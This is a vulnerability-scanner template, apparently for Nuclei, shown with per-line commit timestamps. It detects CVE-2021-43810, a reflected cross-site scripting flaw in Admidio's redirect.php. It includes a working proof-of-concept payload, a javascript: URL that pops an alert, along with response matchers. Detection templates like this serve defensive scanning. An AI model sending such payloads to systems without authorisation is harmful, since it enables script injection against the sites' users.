2022-01-25 04:55:34 +00:00
id : CVE-2021-43810
info :
2022-09-09 17:34:37 +00:00
name : Admidio - Cross-Site Scripting
2022-01-25 04:55:34 +00:00
author : gy741
severity : medium
2022-05-17 09:18:12 +00:00
description : A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:09:01 +00:00
remediation : Upgrade to version 4.0.12 or later.
2022-01-25 04:55:34 +00:00
reference :
2022-01-25 07:04:20 +00:00
- https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
2022-01-25 04:55:34 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-43810
2022-05-17 09:18:12 +00:00
- https://github.com/Admidio/admidio/commit/fcb0609abc1d2f65bc1377866bd678e5d891404b
- https://github.com/Admidio/admidio/commit/c043267d362f7813543cc2785119bf3e3e54fe21
2023-07-11 19:49:27 +00:00
- https://github.com/Admidio/admidio/releases/tag/v4.0.12
2022-01-25 04:55:34 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-01-25 04:55:34 +00:00
cve-id : CVE-2021-43810
cwe-id : CWE-79
2024-05-31 19:23:20 +00:00
epss-score : 0.00396
epss-percentile : 0.73393
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : admidio
product : admidio
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,admidio,xss
2022-01-25 04:55:34 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-25 04:55:34 +00:00
- method : GET
path :
- '{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)'
matchers-condition : and
matchers :
- type : word
part : body
2022-01-25 07:04:20 +00:00
words :
- 'please click <a href="javascript://%0aalert(document.domain)" target="_self">'
2022-01-25 04:55:34 +00:00
- type : word
2022-01-25 07:04:20 +00:00
part : header
2022-01-25 04:55:34 +00:00
words :
- "text/html"
2022-01-25 07:04:20 +00:00
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 4a0a00473045022100953a61bb137c40872ac341046a3d349378dfe44509b0bf81b8dea18ef859cc9402206cb18380503695b43cd279e399ef8aaa40547d01d55325928f48b3e8ed5a395b:922c64590222798bb761d5b6d8e72950